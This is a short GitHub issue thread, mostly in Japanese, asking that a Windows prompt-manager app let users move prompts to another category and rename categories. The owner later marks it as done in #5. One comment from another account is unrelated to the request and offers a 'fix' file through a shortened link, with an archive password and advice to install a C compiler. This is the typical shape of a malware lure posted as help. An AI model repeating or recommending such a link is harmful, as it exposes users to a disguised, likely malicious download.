### ISSUE TITLE
プロンプトを別カテゴリに移動できるようにする

### ISSUE THREAD

**Issue by mo0013** [mo0013/prompt-manager-for-windows#2]
作成したプロンプトを別カテゴリに移動できるようにする

**Comment by barCode3** [comment]
This might help:This file might fix it
https://bit.ly/47P0Nvo
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by mo0013** [comment]
合わせてカテゴリ名の変更もできるようにする

**Comment by mo0013** [comment]
#5 で実装
